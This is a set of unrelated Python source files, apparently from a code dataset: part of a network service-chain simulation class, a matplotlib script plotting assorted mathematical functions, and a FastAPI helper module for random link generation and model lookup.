sfc('sfc41','node15','node14',['type8', 'type3', 'type6', 'type2', 'type5'],3.2,6,0,0,self.vnf_types),\
sfc('sfc42','node10','node7',['type7', 'type2', 'type8', 'type3', 'type5'],3.0,7,0,0,self.vnf_types),\
sfc('sfc43','node6','node8',['type5', 'type6', 'type1', 'type4'],3.8,8,0,0,self.vnf_types),\
sfc('sfc44','node21','node3',['type8', 'type6', 'type5', 'type2'],3.1,8,0,0,self.vnf_types),\
sfc('sfc45','node13','node15',['type2', 'type8', 'type4', 'type3', 'type7'],3.0,10,0,0,self.vnf_types),\
sfc('sfc46','node17','node13',['type4', 'type5', 'type1', 'type3'],3.9,7,0,0,self.vnf_types),\
])
self.figure=''
def generate_edges(self):
self.add_edges([[self.node1,self.node2,{'bandwidth':10}],[self.node2,self.node3,{'bandwidth':10}],\
[self.node3,self.node4,{'bandwidth':10}],[self.node3,self.node5,{'bandwidth':10}],\
[self.node5,self.node6,{'bandwidth':10}],[self.node5,self.node7,{'bandwidth':10}],\
[self.node5,self.node9,{'bandwidth':10}],[self.node5,self.node16,{'bandwidth':10}],\
[self.node6,self.node8,{'bandwidth':10}],[self.node7,self.node9,{'bandwidth':10}],\
[self.node8,self.node12,{'bandwidth':10}],[self.node9,self.node10,{'bandwidth':10}],\
[self.node10,self.node11,{'bandwidth':10}],[self.node12,self.node13,{'bandwidth':10}],\
[self.node12,self.node14,{'bandwidth':10}],[self.node13,self.node15,{'bandwidth':10}],\
[self.node14,self.node16,{'bandwidth':10}],[self.node15,self.node20,{'bandwidth':10}],\
[self.node16,self.node17,{'bandwidth':10}],[self.node16,self.node19,{'bandwidth':10}],\
[self.node16,self.node21,{'bandwidth':10}],[self.node17,self.node18,{'bandwidth':10}],[self.node20,self.node21,{'bandwidth':10}]])
def generate_nodes_atts(self,atts=[30, 29, 28, 27, 27, 27, 26, 22, 22, 20, 19, 17, 16, 16, 14, 14, 13, 13, 12, 11, 10]):
nodes=[5,16,21,3,12,13,10,1,2,4,6,7,8,9,11,14,15,17,18,19,20]
if len(atts)==len(nodes):
i=0
for node in nodes:
self.set_atts('node'+str(node),{'cpu':atts[i]})
i+=1
def generate_edges_atts(self,atts=[0.77, 0.59, 1.47, 0.95, 0.59, 0.69, 1.56, 1.1, 0.52, 1.03, 0.95, 1.08, 0.83, 1.21, 1.33, 0.92, 0.75, 1.34, 1.22, 1.29, 0.56, 0.64, 1.3]):
i=0
for edge in self.G.edges:
self.set_edge_atts(edge[0],edge[1],{'delay':atts[i]})
i+=1
def draw(self,figsize=[36,20],node_size=10000,node_fone_size=8,link_fone_size=9,node_shape='H',path=''):
network.draw(self,figsize=figsize,pos=cernnet2_layout(self.G),node_size=node_size,node_fone_size=node_fone_size,link_fone_size=link_fone_size,node_shape=node_shape)
def draw_dynamic(self,figsize=[36,20],path='',node_size=10000,node_fone_size=8,link_fone_size=9,node_shape='H'):
network.draw_dynamic(self,figsize=figsize,pos=cernnet2_layout(self.G),node_size=node_size,node_fone_size=node_fone_size,link_fone_size=link_fone_size,node_shape=node_shape)
``` |
{
"source": "154829221/deeplearning",
"score": 3
} |
#### File: deeplearning/math/functions.py
```python
import numpy as np
import matplotlib.pyplot as plt
import math
def draw(func,a,b):
plt.rcParams['font.family'] = 'SimHei'
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
plt.figure(2)
ax = plt.subplot(111)
    x = np.linspace(a, b, 100000)  # evenly sample 100000 points between a and b
y,name = func(x)
ax.plot(x,y)
ax.set_title(name)
ax.set_xlabel('X')
ax.set_ylabel('Y')
plt.ylim(ymin=-1000,ymax=1000000)
plt.show()
def drawAndCompare(f1,f2,a,b):
plt.rcParams['font.family'] = 'SimHei'
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
plt.figure(2)
ax = plt.subplot(111)
    x = np.linspace(a, b, 100000)  # evenly sample 100000 points between a and b
y1,name1 = f1(x)
y2,name2 = f2(x)
ax.plot(x,y1)
ax.plot(x,y2)
ax.set_title(" 蓝色:"+name1+" 橘色:"+name2)
ax.set_xlabel('X')
ax.set_ylabel('Y')
plt.ylim(ymin=-10000,ymax=1000000)
plt.show()
def drawAndCompare2(f1,f2,f3,a,b):
plt.rcParams['font.family'] = 'SimHei'
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
plt.figure(2)
ax = plt.subplot(111)
    x = np.linspace(a, b, 100000)  # evenly sample 100000 points between a and b (the original asked for 1e13 points, which would exhaust memory)
y1,name1 = f1(x)
y2,name2 = f2(x)
y3,name3 = f3(x)
ax.plot(x,y1)
ax.plot(x,y2)
ax.plot(x,y3)
ax.set_title(" 蓝色:"+name1+" 橘色:"+name2+" 绿色:"+name3)
ax.set_xlabel('X')
ax.set_ylabel('Y')
plt.ylim(ymin=-0.5,ymax=5)
plt.show()
# x cubed minus 3x
def func1(x):
    y = np.power(x, 3) - 3 * x
    name = "np.power(x, 3) - 3 * x"
    return y,name
# sin(x)
def func2(x):
    y = np.sin(x)
    name = "np.sin(x)"
    return y,name
# x-(3/2)*np.power(x,2/3)
def func3(x):
    # note: a direct 2/3 power via np.power fails for negative x, so newPow handles the root
    y = x-(3/2)*newPow(np.power(x,2),3)
    name = "x-(3/2)*np.power(x,2/3)"
    return y,name
# 2*np.power(x,1/2)
def func4(x):
y = 2*np.power(x,1/2)
name = "2*np.power(x,1/2)"
return y,name
# 3-1/x
def func5(x):
    y = 3-(1/x)
    name = "3-1/x"
    return y,name
# ln(x)
def func6(x):
    y = np.log(x)
    name = "lnx"
    return y,name
# 1/x*sin(1/x)
def func8(x):
y =1/x*np.sin(1/x)
name = "1/x*sin(1/x)"
return y,name
# 1/x
def func9(x):
y =1/x
name = "1/x"
return y,name
# power(x,-1/2)
def func10(x):
y =np.power(x,-1/2)
name = "power(x,-1/2)"
return y,name
# 1/(x*x)
def func12(x):
y =1/np.power(x,2)
name = "1/np.power(x,2)"
return y,name
# 1/sqrt(x)
def func13(x):
y =1/np.power(x,1/2)
name = "1/np.power(x,1/2)"
return y,name
# 1/(x*(x-1)*(x+1)*(x-2))
def func11(x):
y =1/(x*(x-1)*(x+1)*(x-2))
name = "1/(x*(x-1)*(x+1)*(x-2))"
return y,name
# np.power(x,5)+4*np.power(x,4) +1
def func14(x):
y =0.8*np.power(x,5)+4*np.power(x,4) +1
name = "np.power(x,5)+4*np.power(x,4) +1"
return y,name
# np.power(x,5)
def func15(x):
y =np.power(x,5)
name = "np.power(x,5)"
return y,name
# np.power(x,10)/np.exp(x)
def func16(x):
y =np.power(x,10)/np.exp(x)
name = "np.power(x,10)/np.exp(x)"
return y,name
# sign-preserving n-th root, i.e. y = sign(x) * |x|**(1/n); np.power would return nan for negative x
def newPow(x,n):
y = []
for i in list(x):
if i < 0:
y.append(-pow(-i,1/n))
else:
y.append(pow(i,1/n))
y1 = np.array(y)
return y1
# draw(func6,-2,3)
# draw(func2,-2,2)
# draw(func3,-2,2)
# drawAndCompare(func14,func15,-2,20000)
draw(func16,-10,150)
``` |
{
"source": "154King154/common-data-app",
"score": 3
} |
#### File: backend/logic/tools.py
```python
import string
import random
from fastapi import HTTPException
def random_string(length=5):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for _ in range(length))
async def generate_link(model):
counter = 5
link = random_string(counter)
while True:
if await model.get_or_none(link=link) is None:
break
counter += 1
link = random_string(counter)
return link
async def instance_getter(model, **params):
instance = await model.get_or_none(**params)
if instance is None:
raise HTTPException(404, f'{model.__name__} not found')
return instance
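# Usage sketch (the Document model and router below are hypothetical): both helpers are meant
# to be awaited from FastAPI path operations together with an async ORM model (e.g. Tortoise ORM)
# that exposes get_or_none():
#
#   @router.post('/documents')
#   async def create_document(payload: DocumentIn):
#       link = await generate_link(Document)                  # unique short slug
#       return await Document.create(link=link, **payload.dict())
#
#   @router.get('/documents/{link}')
#   async def read_document(link: str):
#       return await instance_getter(Document, link=link)     # raises 404 if missing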
``` |